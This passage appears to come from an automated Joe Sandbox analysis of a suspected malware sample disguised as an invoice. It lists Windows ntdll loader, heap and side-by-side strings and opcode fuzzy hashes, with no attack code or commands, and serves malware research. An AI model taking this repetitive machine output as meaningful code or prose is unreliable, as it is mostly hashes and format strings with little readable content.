                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  Strings
                                  • VerifierFlags, xrefs: 01A98C50
                                  • VerifierDlls, xrefs: 01A98CBD
                                  • AVRF: -*- final list of providers -*- , xrefs: 01A98B8F
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A98A67
                                  • VerifierDebug, xrefs: 01A98CA5
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A98A3D
                                  • HandleTraces, xrefs: 01A98C8F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • LdrpInitShimEngine, xrefs: 01A699F4, 01A69A07, 01A69A30
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A69A2A
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A69A01
                                  • apphelp.dll, xrefs: 01A06496
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A69A11, 01A69A3A
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A699ED
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • LdrpInitializeImportRedirection, xrefs: 01A88177, 01A881EB
                                  • Loading import redirection DLL: '%wZ', xrefs: 01A88170
                                  • LdrpInitializeProcess, xrefs: 01A4C6C4
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01A88181, 01A881F5
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A4C6C3
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A881E5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  Strings
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A821BF
                                  • SXS: %s() passed the empty activation context, xrefs: 01A82165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A82180
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A8219F
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A82178
                                  • RtlGetAssemblyStorageRoot, xrefs: 01A82160, 01A8219A, 01A821BA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  APIs
                                    • Part of subcall function 01A52DF0: LdrInitializeThunk.NTDLL ref: 01A52DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A50D74
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  Strings
                                  • LdrpInitializeProcess, xrefs: 01A48422
                                  • @, xrefs: 01A48591
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A4855E
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A48421
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  Strings
                                  • SXS: %s() passed the empty activation context, xrefs: 01A821DE
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A821D9, 01A822B1
                                  • .Local, xrefs: 01A428D8
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A822B6
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  Strings
                                  • RtlDeactivateActivationContext, xrefs: 01A83425, 01A83432, 01A83451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A8342A
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A83437
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A83456
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A7106B
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A71028
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A710AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A70FE5
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  Strings
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A7A992
                                  • apphelp.dll, xrefs: 01A32462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A7A9A2
                                  • LdrpDynamicShimModule, xrefs: 01A7A998
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 01A23255
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A2327D
                                  • HEAP: , xrefs: 01A23264
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  Strings
                                  • LdrpCheckModule, xrefs: 01A7A117
                                  • Failed to allocated memory for shimmed module list, xrefs: 01A7A10F
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A7A121
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  Strings
                                  • Failed to reallocate the system dirs string !, xrefs: 01A882D7
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A882E8
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 01A882DE
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  Strings
                                  • @, xrefs: 01ACC1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01ACC1C5
                                  • PreferredUILanguages, xrefs: 01ACC212
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  Strings
                                  • LdrpCheckRedirection, xrefs: 01A9488F
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01A94899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A94888
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-3154609507
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  Strings
                                  • Process initialization failed with status 0x%08lx, xrefs: 01A920F3
                                  • LdrpInitializationFailure, xrefs: 01A920FA
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A92104
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  Strings
                                  • LdrResSearchResource Enter, xrefs: 01A1AA13
                                  • LdrResSearchResource Exit, xrefs: 01A1AA25
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  Strings
                                  • kLsE, xrefs: 01A10540
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A1063D
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 0-2547482624
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 01A1A2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 01A1A309
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  • API String ID: 0-1106856819
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  • API String ID: 0-1199573805
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  • API String ID: 0-1948896318
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  • API String ID: 0-1885708031
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A9895E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de367f32a0f4440a07641656c7ab8da7a62885c1198dbb89b48982e87f16dfd2
                                  • Instruction ID: 46721cb3243b94f181a2ae4f0499cbeaeee44dd1c1356d152f3ad9476f013ed0
                                  • Opcode Fuzzy Hash: de367f32a0f4440a07641656c7ab8da7a62885c1198dbb89b48982e87f16dfd2
                                  • Instruction Fuzzy Hash: 6D71DFB5D00625DFCB26CF59C9947BEBBB1FF58720F18411AE942AB355E3389904CBA0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58b9d1834618303199fce2d6e11170139c9daa3d7639318f7c36a9bb7f3f4062
                                  • Instruction ID: 8cb4fc7c2ce4873173406a13d4cb51b40c293278566b14161afe601e1653010a
                                  • Opcode Fuzzy Hash: 58b9d1834618303199fce2d6e11170139c9daa3d7639318f7c36a9bb7f3f4062
                                  • Instruction Fuzzy Hash: 9A7192B1900205EFDB25DF9DDA54A9ABFF8FFA8B10F10425EE614E7258D7318940CB58
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bbeaa0607f66a5d9732daa8751707e1d7f8abd8428dc73060674c3ed9609cbdc
                                  • Instruction ID: 696b2cd6e58b7b917ad5124b4684eb3c844c57cebfbbfa843324e69565b70c08
                                  • Opcode Fuzzy Hash: bbeaa0607f66a5d9732daa8751707e1d7f8abd8428dc73060674c3ed9609cbdc
                                  • Instruction Fuzzy Hash: 8471E5326046528FD326DF2CC484B6AB7E5FF88310F0885AAE899CB356DB34DD45CB91
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction ID: d4a544c2cb289714674fdc759430c5d64f99adf76a079c48329b432fc43436d5
                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction Fuzzy Hash: 75716C71E0061AAFDF10DFA9CA84AAEBBF8FF48750F104569E505E7250DB34EA45CB50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4daa717802acf376447e87d97aad272c8ac3079fae0a988410f903ae8d3d850
                                  • Instruction ID: 348cad1e78c62c342d773c594b8f321955f97e70b7a357524b80989d41a15d7b
                                  • Opcode Fuzzy Hash: e4daa717802acf376447e87d97aad272c8ac3079fae0a988410f903ae8d3d850
                                  • Instruction Fuzzy Hash: 3C710272200B01EFE7329F18CA44F66BBB6EF44720F594418E61A872A1D775E945CF50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83b8598246609a9857faff5011d7c30476dfd477aba773e1615c2f3b2e47df15
                                  • Instruction ID: a31fae8d9dac405e750dbd46956a896be9944cf895539a70bd39165da34a4213
                                  • Opcode Fuzzy Hash: 83b8598246609a9857faff5011d7c30476dfd477aba773e1615c2f3b2e47df15
                                  • Instruction Fuzzy Hash: 2781C272A08315CFDB25DF98D984BADBBB1BF58310F19412EDA04AB285C778DE40CB94
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c9b019e6215f754290cc7b546608e0d4eabd581d84b07638b7e9ad855669feec
                                  • Instruction ID: 2477d883e742617a8ee406a699f7613efac399638884e353a1c31081ee8353d8
                                  • Opcode Fuzzy Hash: c9b019e6215f754290cc7b546608e0d4eabd581d84b07638b7e9ad855669feec
                                  • Instruction Fuzzy Hash: 20711B71E0021AAFDF16DF94C945FEEBBB8FF04350F104129EA10A7290E774AA45CBA0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b451b150af43bd42c2a53bbad45869cdca9cc7f9ec87c1519c5231c2de9884c
                                  • Instruction ID: 6112894754c16e813215cd424ff45705b782f4f9978fe31e822854ea99b0637e
                                  • Opcode Fuzzy Hash: 8b451b150af43bd42c2a53bbad45869cdca9cc7f9ec87c1519c5231c2de9884c
                                  • Instruction Fuzzy Hash: AE51C272504716AFD711DE68C944E6BFBE9EBC8B50F00452DBA41DB150E730DD04C792
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96017b948247d701cf1c891a20daff4c599ca8c4921b6c4d05c29bc8ffa28b96
                                  • Instruction ID: e79a9021fcf0e1f6399b0c18d0bbeb417fc7c0749eee8593cbd4c24850c7c5d5
                                  • Opcode Fuzzy Hash: 96017b948247d701cf1c891a20daff4c599ca8c4921b6c4d05c29bc8ffa28b96
                                  • Instruction Fuzzy Hash: E951AD709007459BD721CFAAC980AABFBFCBF94710F10461ED252576A2C7B8A545CB50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f6c90bad0b48bacb84b96da978b9130036a26b8214ebe78a317eac8584a7fc45
                                  • Instruction ID: de9161410d7382a731c6abc6dd7388abdd64829b72e87cca951014f8ed5bc28d
                                  • Opcode Fuzzy Hash: f6c90bad0b48bacb84b96da978b9130036a26b8214ebe78a317eac8584a7fc45
                                  • Instruction Fuzzy Hash: 9C519E71200A15DFCB22EF69CA80F6AB3F9FF58754F40046AE64297661E738ED44CB50
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bb815de7d0705616607ccc8c98beb67c893b718ea4d3fb2350989d752283e9d
                                  • Instruction ID: 5f39664bae9af4aae6867f533171203522524c24ecf6f52da2de91f55fe07232
                                  • Opcode Fuzzy Hash: 1bb815de7d0705616607ccc8c98beb67c893b718ea4d3fb2350989d752283e9d
                                  • Instruction Fuzzy Hash: B3517B716083829FD754DF29C980AABBBE9FFC8204F48492DF59AC7252E730D905CB52
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction ID: 3da81eddada71b575219ee4cfdc0a8eab3d31ae87627321651b0f687b1724359
                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
